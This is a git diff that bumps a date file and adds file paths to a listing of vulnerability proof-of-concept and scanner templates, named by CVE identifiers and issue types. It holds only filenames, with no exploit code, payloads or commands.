diff --git a/date.txt b/date.txt index d8524ff603..93ea1dc1b2 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240711 +20240712 diff --git a/poc.txt b/poc.txt index 185a2d2583..b2bf13f288 100644 --- a/poc.txt +++ b/poc.txt @@ -1109,6 +1109,7 @@ ./poc/api/graylog-api-browser-7847.yaml ./poc/api/graylog-api-browser-7848.yaml ./poc/api/graylog-api-browser.yaml +./poc/api/hardcoded-api-keys.yaml ./poc/api/hidden-api-endpoint-discovery.yaml ./poc/api/hidden-api-key-exposure.yaml ./poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml @@ -1121,6 +1122,7 @@ ./poc/api/jenkins-api-panel.yaml ./poc/api/jsapi-ticket-json.yaml ./poc/api/json-api-user-f16cf82a0bff766957f5ffe30cf56da5.yaml +./poc/api/json-api-user.yaml ./poc/api/json-rest-api-31c9d035c4d3fc5d6caff4ae5faad462.yaml ./poc/api/json-rest-api-3dd5f6c2ef85279c6ee30af7fc5abc9f.yaml ./poc/api/json-rest-api-51a664d5e756a621ddf01cb744c6394a.yaml @@ -1214,6 +1216,7 @@ ./poc/api/mstore-api-e4ec9913d1bb92387e5617f1a9154fbf.yaml ./poc/api/mstore-api-e4ef9806cec7ccd2f80285c1d7ff358b.yaml ./poc/api/mstore-api-f49bee9dc34bbcc46c27d950b1ad9f49.yaml +./poc/api/mstore-api-fcf575731390b94d640824227bb01949.yaml ./poc/api/mstore-api-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/api/mstore-api-plugin.yaml ./poc/api/mstore-api.yaml @@ -1661,6 +1664,7 @@ ./poc/auth/Mallbuilder-smarty_config_key-SQLi.yaml ./poc/auth/Mallbuilder-sub_site_key-SQLi.yaml ./poc/auth/Mallbuilder-wap_key-SQLi.yaml +./poc/auth/Mantis-Default_login.yaml ./poc/auth/Metinfo-V5_0_admin_memeber_getpassword-SQLi.yaml ./poc/auth/Metinfo-login_check-SQLi.yaml ./poc/auth/MinIO-default-login.yaml @@ -2556,6 +2560,7 @@ ./poc/auth/dell-idrac9-default-password.yaml ./poc/auth/dell-openmanager-login-1.yaml ./poc/auth/dell-openmanager-login-2.yaml +./poc/auth/dell-openmanager-login-6948.yaml ./poc/auth/dell-openmanager-login-6949.yaml ./poc/auth/dell-openmanager-login-6950.yaml ./poc/auth/dell-openmanager-login-6951.yaml @@ -3121,6 +3126,7 @@ ./poc/auth/hadoop-yarn-unauth.yml ./poc/auth/hand-srm-auth-bypass.yaml ./poc/auth/haofeng-firewall-setdomain-unauth.yaml +./poc/auth/hardcoded-api-keys.yaml ./poc/auth/hcommonssocial-mastodon-instance.yaml ./poc/auth/heateor-social-login-0a5ef8161e1b27d27ad667d562e5e6e6.yaml ./poc/auth/heateor-social-login-2d825c781bd7a85cdacd3ba818cfb8d6.yaml @@ -3259,6 +3265,7 @@ ./poc/auth/imm-default-login.yaml ./poc/auth/influxdb-unauth.yaml ./poc/auth/influxdb-unauth.yml +./poc/auth/insecure-cookie-storage.yaml ./poc/auth/inspur-clusterengine-default-login-8162.yaml ./poc/auth/inspur-clusterengine-default-login.yaml ./poc/auth/intelbras-dvr-unauth.yaml @@ -3601,6 +3608,7 @@ ./poc/auth/login-lockdown-plugin.yaml ./poc/auth/login-lockdown.yaml ./poc/auth/login-logo-editor-by-oizuled-df7f12b9bdf6cc2fa7ed8a3fd4ac3db1.yaml +./poc/auth/login-logo-editor-by-oizuled.yaml ./poc/auth/login-logout-menu-05a345752bfcb11318d95605d47eaf4e.yaml ./poc/auth/login-logout-menu.yaml ./poc/auth/login-logout-register-menu-061c21d865141200e72a763ae5ce4c49.yaml @@ -3839,6 +3847,7 @@ ./poc/auth/miniorange-login-with-whmcs.yaml ./poc/auth/miniorange-oauth-20-server-309857313f8af7377dac370c25c0ccc2.yaml ./poc/auth/miniorange-oauth-20-server.yaml +./poc/auth/miscellaneous_unencrypted-bigip-ltm-cookie.yaml ./poc/auth/missing-authorization-simply-gallery-block.yaml ./poc/auth/mkey.yaml ./poc/auth/mlflow-unauth.yaml @@ -4285,6 +4294,7 @@ ./poc/auth/private-key (copy 1).yaml ./poc/auth/private-key-9655.yaml ./poc/auth/private-key-9656.yaml +./poc/auth/private-key-9657.yaml ./poc/auth/private-key-9658.yaml ./poc/auth/private-key-exposure-9654.yaml ./poc/auth/private-key-exposure.yaml @@ -4644,6 +4654,7 @@ ./poc/auth/shikongzhiyou-erp-login-fileread.yaml ./poc/auth/shikongzhiyou-login_fileread.yaml ./poc/auth/shiro-124-rememberme.yaml +./poc/auth/shopify-custom-token(1).yaml ./poc/auth/shopify-custom-token-10198.yaml ./poc/auth/shopify-custom-token-11860.yaml ./poc/auth/shopify-custom-token.yaml @@ -5294,6 +5305,7 @@ ./poc/auth/woo-login-redirect-317022364d5cdae673f22cdada5aba50.yaml ./poc/auth/woo-login-redirect-e4654f9a46c58ec7da5e9256a56d6e89.yaml ./poc/auth/woo-login-redirect.yaml +./poc/auth/woo-social-login-5d26f7f4cd542d88ac86877ec3302d5a.yaml ./poc/auth/woo-social-login-d6ff5be910b5d6bdcf7d2ef1b1e7a302.yaml ./poc/auth/woo-social-login-df594682d71b9580592ccaad26e0910f.yaml ./poc/auth/woo-social-login.yaml @@ -5324,6 +5336,7 @@ ./poc/auth/wordpress-weak-credentials-11337.yaml ./poc/auth/wordpress-weak-credentials.yaml ./poc/auth/wp-activate-register-redirect.yaml +./poc/auth/wp-cookie-law-info-1482e7982321747b7cd5ff73a34a6241.yaml ./poc/auth/wp-cookie-user-info-d2666c85e1e86cfe042cf280f363f5ef.yaml ./poc/auth/wp-cookie-user-info.yaml ./poc/auth/wp-cookiechoise-49c784dadada512317c333c6a9b682b5.yaml @@ -6253,6 +6266,7 @@ ./poc/backup/backup-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/backup/backup-dfb23ad410a77521697d97ea99e7e073.yaml ./poc/backup/backup-e42a9c2ca6da6ad00e6abf9dcbdaa680.yaml +./poc/backup/backup-enabled.yaml ./poc/backup/backup-exposure.yaml ./poc/backup/backup-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/backup/backup-plugin.yaml @@ -6815,6 +6829,7 @@ ./poc/cnvd/cnvd-2020-68596-1074.yaml ./poc/cnvd/cnvd-2020-68596-1075.yaml ./poc/cnvd/cnvd-2020-68596-1076.yaml +./poc/cnvd/cnvd-2021-01627.yaml ./poc/cnvd/cnvd-2021-01931-1077.yaml ./poc/cnvd/cnvd-2021-01931-1078.yaml ./poc/cnvd/cnvd-2021-01931-1079.yaml @@ -6853,6 +6868,7 @@ ./poc/cnvd/cnvd-2021-30167-1111.yaml ./poc/cnvd/cnvd-2021-30167-1112.yaml ./poc/cnvd/cnvd-2021-30167-2.yaml +./poc/cnvd/cnvd-2021-39018.yaml ./poc/cnvd/cnvd-2021-49104-1113.yaml ./poc/cnvd/cnvd-2021-49104-1114.yaml ./poc/cnvd/cnvd-2021-49104-1115.yaml @@ -7253,6 +7269,7 @@ ./poc/config/huiwen-book-config-properties-info-leak.yaml ./poc/config/iconfinder.yaml ./poc/config/insecure-cors-configuration.yaml +./poc/config/insecure-network-security-config.yaml ./poc/config/insecure_transport_networksecurityconfig.yaml ./poc/config/ispconfig.yaml ./poc/config/joomla-config-dist-file.yaml @@ -25565,6 +25582,7 @@ ./poc/cve/CVE-2023-27431.yaml ./poc/cve/CVE-2023-27432-31e4776d98ef9006766b00acbec90b5b.yaml ./poc/cve/CVE-2023-27432.yaml +./poc/cve/CVE-2023-27433-3a4635f1bb04659c34bc942b2ee92d35.yaml ./poc/cve/CVE-2023-27433-8ad97897642706324135ab1544abac6c.yaml ./poc/cve/CVE-2023-27433.yaml ./poc/cve/CVE-2023-27434-74489fa89f79a1cf079bfa2e061534ec.yaml @@ -26551,6 +26569,7 @@ ./poc/cve/CVE-2023-32293.yaml ./poc/cve/CVE-2023-32294-5057b2645214df6b711d4caf48ffe4b3.yaml ./poc/cve/CVE-2023-32294.yaml +./poc/cve/CVE-2023-32295-adeadd61673ff754eeea8f27386bb546.yaml ./poc/cve/CVE-2023-32295-cb5aa68901486d4487c22ff5e19342fe.yaml ./poc/cve/CVE-2023-32295.yaml ./poc/cve/CVE-2023-32296-6ecd535760a6333ac52ec98a207999db.yaml @@ -28394,6 +28413,7 @@ ./poc/cve/CVE-2023-4388.yaml ./poc/cve/CVE-2023-4390-66649ffdb36cd010d115a4146fb3030b.yaml ./poc/cve/CVE-2023-4390.yaml +./poc/cve/CVE-2023-44012.yaml ./poc/cve/CVE-2023-4402-1b9127ecbaee455b31f3148a779bb508.yaml ./poc/cve/CVE-2023-4402-ca086de05680fd294b9d68d7d6192e37.yaml ./poc/cve/CVE-2023-4402.yaml @@ -28752,6 +28772,7 @@ ./poc/cve/CVE-2023-45647.yaml ./poc/cve/CVE-2023-45650-c72131e3b8c54af32430c0557ec3df64.yaml ./poc/cve/CVE-2023-45650.yaml +./poc/cve/CVE-2023-45651-0937cd12d44fa449982b54a7625dc67c.yaml ./poc/cve/CVE-2023-45651-cb6ce8f1e51926d97fec8615734f57ff.yaml ./poc/cve/CVE-2023-45651.yaml ./poc/cve/CVE-2023-45652-9d0559c4c8b6ddfb9b6c78ca8006a265.yaml @@ -30545,6 +30566,7 @@ ./poc/cve/CVE-2023-5126-81339a8d123fc2bbcc021e5eb150085a.yaml ./poc/cve/CVE-2023-5126.yaml ./poc/cve/CVE-2023-5127-807c7cd24e84285d77e31714c46bb74c.yaml +./poc/cve/CVE-2023-5127-a7f79b7db76a186e4a88065c0255d51e.yaml ./poc/cve/CVE-2023-5127.yaml ./poc/cve/CVE-2023-5128-f330d9ed9b9790ec415eadb0e7d3a532.yaml ./poc/cve/CVE-2023-5128.yaml @@ -32434,6 +32456,7 @@ ./poc/cve/CVE-2024-0618-52661905a7e87c094b40c1d3552de589.yaml ./poc/cve/CVE-2024-0618.yaml ./poc/cve/CVE-2024-0619-9c9229a4c48d14a1747b764594b146f8.yaml +./poc/cve/CVE-2024-0619.yaml ./poc/cve/CVE-2024-0620-3fc81dfac05f835baef17a91c5f01c73.yaml ./poc/cve/CVE-2024-0620.yaml ./poc/cve/CVE-2024-0621-928ff4e5176ea8eb39da84fa88fff6f8.yaml @@ -32511,6 +32534,7 @@ ./poc/cve/CVE-2024-0697-d2066f9558e9d177183f0924451a8a89.yaml ./poc/cve/CVE-2024-0697.yaml ./poc/cve/CVE-2024-0698-4cc9c81bc663b8b9dbbabd8c52817841.yaml +./poc/cve/CVE-2024-0698-7812bebb699647411197d57a932ea601.yaml ./poc/cve/CVE-2024-0698.yaml ./poc/cve/CVE-2024-0699-fd1ed8e35cc1d8cf328028f1626808fa.yaml ./poc/cve/CVE-2024-0699.yaml @@ -33068,6 +33092,7 @@ ./poc/cve/CVE-2024-1370.yaml ./poc/cve/CVE-2024-1371-0bc449e0e7de5b937e749fa329113333.yaml ./poc/cve/CVE-2024-1371.yaml +./poc/cve/CVE-2024-1375-1c5d367114d7ddb0cfb5bf0cfba7e6f4.yaml ./poc/cve/CVE-2024-1376-6245b509caa1efe80cd6b63b8a6f4884.yaml ./poc/cve/CVE-2024-1376.yaml ./poc/cve/CVE-2024-1377-a3f56e4835ede0f655d0b1f99ad37281.yaml @@ -34225,6 +34250,7 @@ ./poc/cve/CVE-2024-2458-abb8aee35247a141525e62dff20b2de2.yaml ./poc/cve/CVE-2024-2458.yaml ./poc/cve/CVE-2024-2459-4aad7872cad70dd0375e267ce108fb6e.yaml +./poc/cve/CVE-2024-2459-b027ab33ba2a278eff5e5dce1de7992a.yaml ./poc/cve/CVE-2024-2459.yaml ./poc/cve/CVE-2024-2460-26fe9f09904baed26b624bbb5346ae24.yaml ./poc/cve/CVE-2024-2460.yaml @@ -35729,6 +35755,7 @@ ./poc/cve/CVE-2024-31123-46879f6952a95f79a6c0f7eebd2fcaad.yaml ./poc/cve/CVE-2024-31123.yaml ./poc/cve/CVE-2024-3113-e4940d1c92eec01b1093565ed8e818ee.yaml +./poc/cve/CVE-2024-3113.yaml ./poc/cve/CVE-2024-31211-1580aa9304908173d37ac71ddd2dc070.yaml ./poc/cve/CVE-2024-31211.yaml ./poc/cve/CVE-2024-31229-d57fb6d7d9a5e7ec4956e46b8a22e56d.yaml @@ -37896,6 +37923,7 @@ ./poc/cve/CVE-2024-35772-564187d916ac772681f7a05d73ab0b02.yaml ./poc/cve/CVE-2024-35772.yaml ./poc/cve/CVE-2024-35773-a343f2335f928149a67b17443d35f70d.yaml +./poc/cve/CVE-2024-35773.yaml ./poc/cve/CVE-2024-35774-66d7d7a60d2560eb3e1dc6a796641e3a.yaml ./poc/cve/CVE-2024-35774.yaml ./poc/cve/CVE-2024-35776-676c750062e966905c2ff1cdfc902e36.yaml @@ -37958,6 +37986,7 @@ ./poc/cve/CVE-2024-3604-a1059e0e1943b07812d39e1e95e64410.yaml ./poc/cve/CVE-2024-3604.yaml ./poc/cve/CVE-2024-3605-07a52b9e49ec11022ad31ee15eda72d7.yaml +./poc/cve/CVE-2024-3605-893f642800f4ff8104bc05d11d9d64f4.yaml ./poc/cve/CVE-2024-3605.yaml ./poc/cve/CVE-2024-3606-ba356c4fdc9d5a2625565eda2a2407a4.yaml ./poc/cve/CVE-2024-3606.yaml @@ -38157,6 +38186,7 @@ ./poc/cve/CVE-2024-37207-71af3e49ea9f731761a2696898a405a6.yaml ./poc/cve/CVE-2024-37207-a37808e901374c62e3dd7137610783f5.yaml ./poc/cve/CVE-2024-37207.yaml +./poc/cve/CVE-2024-37208-41a123aa90310d1bc3668630515dd4b4.yaml ./poc/cve/CVE-2024-37208-abd060bee158c03be9b30abc681b7797.yaml ./poc/cve/CVE-2024-37208.yaml ./poc/cve/CVE-2024-37209-6ae10b84c5e6849812f74c81949293dd.yaml @@ -38200,6 +38230,7 @@ ./poc/cve/CVE-2024-37227.yaml ./poc/cve/CVE-2024-37228-ed7d7619e63bf5d8a3c199614f4cfa4f.yaml ./poc/cve/CVE-2024-37228.yaml +./poc/cve/CVE-2024-3723-6a8d8983784d52d36ad10054ff4fa22d.yaml ./poc/cve/CVE-2024-3723-d395712f80a36f15447c57e303c9aef2.yaml ./poc/cve/CVE-2024-3723.yaml ./poc/cve/CVE-2024-37230-2e2a0c64c8bbf43ee5b740e957f1c2fc.yaml @@ -38321,6 +38352,7 @@ ./poc/cve/CVE-2024-37417-17e249102d48e118a0b19bbabc7292ff.yaml ./poc/cve/CVE-2024-37417.yaml ./poc/cve/CVE-2024-37418-05db60522c21a7457536fa10e514be05.yaml +./poc/cve/CVE-2024-37418.yaml ./poc/cve/CVE-2024-37420-ad88925a425d7a49f6558c345f67937b.yaml ./poc/cve/CVE-2024-37420.yaml ./poc/cve/CVE-2024-37421-58b72a8b8859cfec6e27e872ed96e8d0.yaml @@ -38436,57 +38468,117 @@ ./poc/cve/CVE-2024-3748-31b09dfbf1b3276476df3f754a6db443.yaml ./poc/cve/CVE-2024-3748.yaml ./poc/cve/CVE-2024-37480-4cb929e0b92a2853cbdbd2b90d9c6482.yaml +./poc/cve/CVE-2024-37480.yaml ./poc/cve/CVE-2024-37481-a6312c5ab123497231ce0e4d80fb8e9a.yaml +./poc/cve/CVE-2024-37481.yaml ./poc/cve/CVE-2024-37482-c0038ae4e786575eea7a517dafef3560.yaml +./poc/cve/CVE-2024-37482.yaml ./poc/cve/CVE-2024-37483-e4647c1ac0cebe589d5027a81095c45b.yaml +./poc/cve/CVE-2024-37483.yaml +./poc/cve/CVE-2024-37484-268dda492f5150a724a992740426bb04.yaml ./poc/cve/CVE-2024-37485-e035eeb64e03142401b35d863c586a6a.yaml +./poc/cve/CVE-2024-37485.yaml +./poc/cve/CVE-2024-37486-19594e3dcc418d35c3df3c4e54bbb166.yaml ./poc/cve/CVE-2024-37487-1eb8b3bf60605e67d92c8cbfd233cb5f.yaml +./poc/cve/CVE-2024-37487.yaml ./poc/cve/CVE-2024-37488-82944b7c1274936dd47058efa26d24cf.yaml +./poc/cve/CVE-2024-37488.yaml ./poc/cve/CVE-2024-37489-eecff52235cf4b2c88b8d79af4bd9758.yaml +./poc/cve/CVE-2024-37489.yaml ./poc/cve/CVE-2024-3749-9287cba02fe103d03e53eac71937b0b0.yaml ./poc/cve/CVE-2024-3749.yaml ./poc/cve/CVE-2024-37490-4ee76b750378c7b611fba8fae4fe0d33.yaml +./poc/cve/CVE-2024-37490.yaml ./poc/cve/CVE-2024-37491-6a00c89a32cd1458103365b69b796ce2.yaml +./poc/cve/CVE-2024-37491.yaml ./poc/cve/CVE-2024-37493-55a4663cae93f2a0b18b5ba28abd7a35.yaml +./poc/cve/CVE-2024-37493.yaml +./poc/cve/CVE-2024-37494-f4ebe0114b81c014e2a630101bbd3437.yaml ./poc/cve/CVE-2024-37495-97aa99796008307f80b8753e898943e6.yaml +./poc/cve/CVE-2024-37495.yaml ./poc/cve/CVE-2024-37496-afb95127cf093f48bedbed6b551f34e6.yaml ./poc/cve/CVE-2024-37496-b7a1b75fee60e0cf7e261285da156813.yaml ./poc/cve/CVE-2024-37496-c3366ec2ce8ac09fd2c5de4bfdd1b57d.yaml +./poc/cve/CVE-2024-37496.yaml ./poc/cve/CVE-2024-37497-04ceca7c3d8e695ef2798cf377e1e381.yaml +./poc/cve/CVE-2024-37497.yaml +./poc/cve/CVE-2024-37498-5ca1ebb7430871c53aaad4d4050be866.yaml +./poc/cve/CVE-2024-37499-9c8c8319e9d62a526411808fbf61d004.yaml ./poc/cve/CVE-2024-3750-8af6c92d6aee690216f9bb18a58ab606.yaml ./poc/cve/CVE-2024-3750.yaml ./poc/cve/CVE-2024-37500-b520f54c295b04af1ea9cf882b55711b.yaml +./poc/cve/CVE-2024-37500.yaml +./poc/cve/CVE-2024-37501-f4a4954ef520b11fe945539eee4d725a.yaml +./poc/cve/CVE-2024-37502-c644ed606f2fa9ec9dcd303a2385f2d9.yaml ./poc/cve/CVE-2024-37503-8e98a2fc8a522310cfa5d2f6e3166fa4.yaml +./poc/cve/CVE-2024-37503.yaml +./poc/cve/CVE-2024-37504-98709d7aeb683339a4f0f1643d401063.yaml ./poc/cve/CVE-2024-37505-706b7bf7f70948292a055aba31f6cd84.yaml +./poc/cve/CVE-2024-37505.yaml ./poc/cve/CVE-2024-37506-5a634f417a281916ab6fcdc12eb2483b.yaml +./poc/cve/CVE-2024-37506.yaml ./poc/cve/CVE-2024-37507-a2c5f65593704b98f856e08917cfc59c.yaml +./poc/cve/CVE-2024-37507.yaml ./poc/cve/CVE-2024-37509-8035b1bcc508383ff24295f9492a2ce8.yaml +./poc/cve/CVE-2024-37509.yaml ./poc/cve/CVE-2024-37510-dbcbf318b5aff3ec74e22f4d22e33095.yaml +./poc/cve/CVE-2024-37510.yaml ./poc/cve/CVE-2024-37511-e0bf851bc4be1f1a1399264e5d993384.yaml +./poc/cve/CVE-2024-37511.yaml ./poc/cve/CVE-2024-37512-8712dca1dddfc2b262e701ecca5729f0.yaml +./poc/cve/CVE-2024-37512.yaml +./poc/cve/CVE-2024-37513-a7cbab2b046523bee49d7bf1eb31247b.yaml ./poc/cve/CVE-2024-37514-1a5fae4303d1d4282a11433fe050c4fa.yaml +./poc/cve/CVE-2024-37514.yaml ./poc/cve/CVE-2024-37515-c60d52cfaf4341fedbf7287df44b0587.yaml +./poc/cve/CVE-2024-37515.yaml ./poc/cve/CVE-2024-37516-08b10b19a70393c8cadd1d27910bd520.yaml +./poc/cve/CVE-2024-37516.yaml ./poc/cve/CVE-2024-37517-2a3eeeca82f7367ff7b56650d01524f3.yaml +./poc/cve/CVE-2024-37517.yaml ./poc/cve/CVE-2024-37518-1a96e4fdad7ba5a00e20bb5aff75ea79.yaml +./poc/cve/CVE-2024-37518.yaml ./poc/cve/CVE-2024-37519-a78bf1a8743e22459333bdc6b0f6cce2.yaml +./poc/cve/CVE-2024-37519.yaml ./poc/cve/CVE-2024-3752-a584a4abc971b7d8780694781afe910d.yaml ./poc/cve/CVE-2024-3752.yaml +./poc/cve/CVE-2024-37520-716538775af6495dab344aec00104a9c.yaml ./poc/cve/CVE-2024-37521-4f373bf1c394a625a7e094203ad48313.yaml +./poc/cve/CVE-2024-37521.yaml ./poc/cve/CVE-2024-37522-57fe7d5869fa828ed48ecf7303de083d.yaml +./poc/cve/CVE-2024-37522.yaml ./poc/cve/CVE-2024-37523-fa90bbfbf8d8ec3b27537ac03788a777.yaml +./poc/cve/CVE-2024-37523.yaml ./poc/cve/CVE-2024-37536-b49d0d2b5ebdcb4461912c71740e86f5.yaml +./poc/cve/CVE-2024-37536.yaml ./poc/cve/CVE-2024-37537-d6ab8b42b76eb8443b2f57d11b840e16.yaml +./poc/cve/CVE-2024-37537.yaml ./poc/cve/CVE-2024-37538-31139d098a0bf640362641c6f9a62650.yaml +./poc/cve/CVE-2024-37538.yaml ./poc/cve/CVE-2024-37539-5d837d961aa984865b72b899835e887f.yaml +./poc/cve/CVE-2024-37539.yaml ./poc/cve/CVE-2024-3754-5cb1674c7f47c3b022a3d4bf7b71ef2e.yaml ./poc/cve/CVE-2024-3754.yaml ./poc/cve/CVE-2024-37540-8cbf618dd92d73c44ede2777170fcf11.yaml +./poc/cve/CVE-2024-37540.yaml ./poc/cve/CVE-2024-37543-45498458ade80405d5c87896b7d832be.yaml +./poc/cve/CVE-2024-37543.yaml ./poc/cve/CVE-2024-37544-a4723779c88983144a3e21f7a6f2e261.yaml +./poc/cve/CVE-2024-37544.yaml ./poc/cve/CVE-2024-37545-913b6f170f57aadea54c7de6197ef40d.yaml +./poc/cve/CVE-2024-37545.yaml +./poc/cve/CVE-2024-37548-aa13afe127ae1250e38ff1ab1e3c993f.yaml +./poc/cve/CVE-2024-37549-12c744087a84afdad26cd5b8fd979e19.yaml ./poc/cve/CVE-2024-3755-6c940ea4aa52dfa83814d7250228dc44.yaml ./poc/cve/CVE-2024-3755.yaml +./poc/cve/CVE-2024-37550-899df573f208f132a37d992e94264fa2.yaml +./poc/cve/CVE-2024-37551-30ba8e0e27e41b07f206885fbd0f970d.yaml +./poc/cve/CVE-2024-37552-0f092aea40433dc1a9807eac78c54478.yaml +./poc/cve/CVE-2024-37553-814aed2cce0a99734effc0fce6fa4924.yaml +./poc/cve/CVE-2024-37556-2d5fe2ea4cda9d653af007392d258b12.yaml +./poc/cve/CVE-2024-37557-15308d26371d21d850989dd3e70007d4.yaml +./poc/cve/CVE-2024-37558-73dfa7f52e3cbd65ca4ea8d77bbf6075.yaml +./poc/cve/CVE-2024-37559-b01104fa5250bd4cc82dcf070c572574.yaml ./poc/cve/CVE-2024-3756-74a7d165b5df38ae6d4dd414fff72de5.yaml ./poc/cve/CVE-2024-3756.yaml ./poc/cve/CVE-2024-3773-0d0d1aa860e731ddc5640c40165410ca.yaml @@ -38494,7 +38586,10 @@ ./poc/cve/CVE-2024-37881-de90eab10ab5bda47399add39eb7f97b.yaml ./poc/cve/CVE-2024-37881.yaml ./poc/cve/CVE-2024-37934-eb88bf54f7aab90b69236f6f77b6a430.yaml +./poc/cve/CVE-2024-37934.yaml ./poc/cve/CVE-2024-37937-003e64635ca79abd7d00c4acdf1389ba.yaml +./poc/cve/CVE-2024-37937.yaml +./poc/cve/CVE-2024-37952-d997ef520bef07d3da32164f9b56452a.yaml ./poc/cve/CVE-2024-3806-2a7b3e2b9fc8d52b51ef6216a756d24e.yaml ./poc/cve/CVE-2024-3806.yaml ./poc/cve/CVE-2024-3807-5cb80fe97a7c317b98a23580210dfc00.yaml @@ -38865,6 +38960,7 @@ ./poc/cve/CVE-2024-4316.yaml ./poc/cve/CVE-2024-4318-57bbaef6e52c16ea657b2fe29b887a70.yaml ./poc/cve/CVE-2024-4318.yaml +./poc/cve/CVE-2024-4319-34769eeaef5d684df8029c20a81cb8f8.yaml ./poc/cve/CVE-2024-4319-c5a4e1b355a0a92313a0c79292c263f8.yaml ./poc/cve/CVE-2024-4319.yaml ./poc/cve/CVE-2024-4324-83e6d760adb900f9290e996e03752999.yaml @@ -39509,6 +39605,7 @@ ./poc/cve/CVE-2024-5324-9a3eaf2fd15c85202b4211d15f845686.yaml ./poc/cve/CVE-2024-5324-f62a2b5d8ff5fddc7cbc75a5c73ab123.yaml ./poc/cve/CVE-2024-5324.yaml +./poc/cve/CVE-2024-5325-3adca2c9386109ab6bde7b399106ff1a.yaml ./poc/cve/CVE-2024-5326-06c485677a4b894ed45f5bd551927dc9.yaml ./poc/cve/CVE-2024-5326.yaml ./poc/cve/CVE-2024-5327-c9ec3faf7380d55c4bb32eeaa8c62803.yaml @@ -39636,6 +39733,7 @@ ./poc/cve/CVE-2024-5573.yaml ./poc/cve/CVE-2024-5574-0488e940a09832d53b97b6d13386b168.yaml ./poc/cve/CVE-2024-5574.yaml +./poc/cve/CVE-2024-5575-ccd1ae62aaea3e252185d13b255c0017.yaml ./poc/cve/CVE-2024-5577-90f4a603eb705b3f2b3e516218d53580.yaml ./poc/cve/CVE-2024-5577.yaml ./poc/cve/CVE-2024-5584-9e83a16e4845144224090f291ae51eb8.yaml @@ -39878,11 +39976,13 @@ ./poc/cve/CVE-2024-6205-af5eccf04cdfb3b426d8a706c2a4aae8.yaml ./poc/cve/CVE-2024-6205.yaml ./poc/cve/CVE-2024-6210-e99c0c9e6390d8a378d187a8b3ee135e.yaml +./poc/cve/CVE-2024-6210.yaml ./poc/cve/CVE-2024-6225-1227371c2fa965fd92b0b4599a6a39a8.yaml ./poc/cve/CVE-2024-6225.yaml ./poc/cve/CVE-2024-6244-0fdd79a418ce6f036d3a58b62d1641ba.yaml ./poc/cve/CVE-2024-6244.yaml ./poc/cve/CVE-2024-6256-730d337283cb2840be9197b921040e68.yaml +./poc/cve/CVE-2024-6256.yaml ./poc/cve/CVE-2024-6262-fe4294382b4ee9312c910d1c2e5c4521.yaml ./poc/cve/CVE-2024-6262.yaml ./poc/cve/CVE-2024-6263-ffb234ba874e4b0186352f4653aaea95.yaml @@ -39930,10 +40030,13 @@ ./poc/cve/CVE-2024-6320.yaml ./poc/cve/CVE-2024-6321-4a66b0d793d27f7e9cab42533357bd01.yaml ./poc/cve/CVE-2024-6321.yaml +./poc/cve/CVE-2024-6328-dcb1447304523613e0a565cd368725f8.yaml ./poc/cve/CVE-2024-6334-32cc27bdc2750532a6a94260dc479796.yaml ./poc/cve/CVE-2024-6334.yaml ./poc/cve/CVE-2024-6340-3d664d98a38ce651d2f44b9fd50c72cb.yaml +./poc/cve/CVE-2024-6340-b92db2bd08ff1e8a54a1c37865c95bfd.yaml ./poc/cve/CVE-2024-6340.yaml +./poc/cve/CVE-2024-6353-aeac136c8766bcc9ba7a513118de3d16.yaml ./poc/cve/CVE-2024-6363-bdc6515c76dd29e50418b2f4336c1916.yaml ./poc/cve/CVE-2024-6363.yaml ./poc/cve/CVE-2024-6365-60a63e9f35d00a2e8cd6ce27df1cbbc6.yaml @@ -39941,7 +40044,9 @@ ./poc/cve/CVE-2024-6387.yaml ./poc/cve/CVE-2024-6391-7012568c40efb7d8e8c0fd5664f4589f.yaml ./poc/cve/CVE-2024-6391.yaml +./poc/cve/CVE-2024-6392-fedb5f8d165b9e77244d2586825aec11.yaml ./poc/cve/CVE-2024-6397-e1c0929ad0dc48578299bac6e98835ff.yaml +./poc/cve/CVE-2024-6397.yaml ./poc/cve/CVE-2024-6405-aaa40ed22a1f2d2e9a92b21e3bb02ef3.yaml ./poc/cve/CVE-2024-6405.yaml ./poc/cve/CVE-2024-6410-e0557d736e6d7ba9354551c87bc46975.yaml @@ -39951,13 +40056,21 @@ ./poc/cve/CVE-2024-6434-99cbefa2a216fc9fd068a2d586b3787b.yaml ./poc/cve/CVE-2024-6434.yaml ./poc/cve/CVE-2024-6447-1130432e15f90ec4bd6402483af13599.yaml +./poc/cve/CVE-2024-6447.yaml +./poc/cve/CVE-2024-6495-7f7d4d9be9d13fb4035edaa3d3829c0a.yaml ./poc/cve/CVE-2024-6550-879ce5421f391ab061ab24b1a7b2f495.yaml ./poc/cve/CVE-2024-6550.yaml ./poc/cve/CVE-2024-6554-0089477ce3aa0d883c9d95074bb284d4.yaml +./poc/cve/CVE-2024-6554.yaml +./poc/cve/CVE-2024-6555-1c76150fa160f9231819314a38f0a183.yaml ./poc/cve/CVE-2024-6556-e46c1d6b4166141caff68ead52ec4cf7.yaml ./poc/cve/CVE-2024-6556.yaml +./poc/cve/CVE-2024-6588-af347ddbbf742df5b2786c5ede788153.yaml ./poc/cve/CVE-2024-6624-3e8f54a8f5a599fccb32276f2c459503.yaml +./poc/cve/CVE-2024-6624.yaml +./poc/cve/CVE-2024-6625-e3b1fd85860f69080f38118a4ce4bb79.yaml ./poc/cve/CVE-2024-6666-f524b500b74a1c90be50f56d9d664783.yaml +./poc/cve/CVE-2024-6666.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml ./poc/cve/CVE_2024_0195.yaml @@ -40294,17 +40407,20 @@ ./poc/cve/cve-2010-1056-1542.yaml ./poc/cve/cve-2010-1056-1543.yaml ./poc/cve/cve-2010-1056-1544.yaml +./poc/cve/cve-2010-1056.yaml ./poc/cve/cve-2010-1081-1545.yaml ./poc/cve/cve-2010-1081-1546.yaml ./poc/cve/cve-2010-1081-1547.yaml ./poc/cve/cve-2010-1081-1548.yaml ./poc/cve/cve-2010-1081-1549.yaml ./poc/cve/cve-2010-1081-1550.yaml +./poc/cve/cve-2010-1081.yaml ./poc/cve/cve-2010-1217-1551.yaml ./poc/cve/cve-2010-1217-1552.yaml ./poc/cve/cve-2010-1217-1553.yaml ./poc/cve/cve-2010-1217-1554.yaml ./poc/cve/cve-2010-1217-1555.yaml +./poc/cve/cve-2010-1217.yaml ./poc/cve/cve-2010-1219-1556.yaml 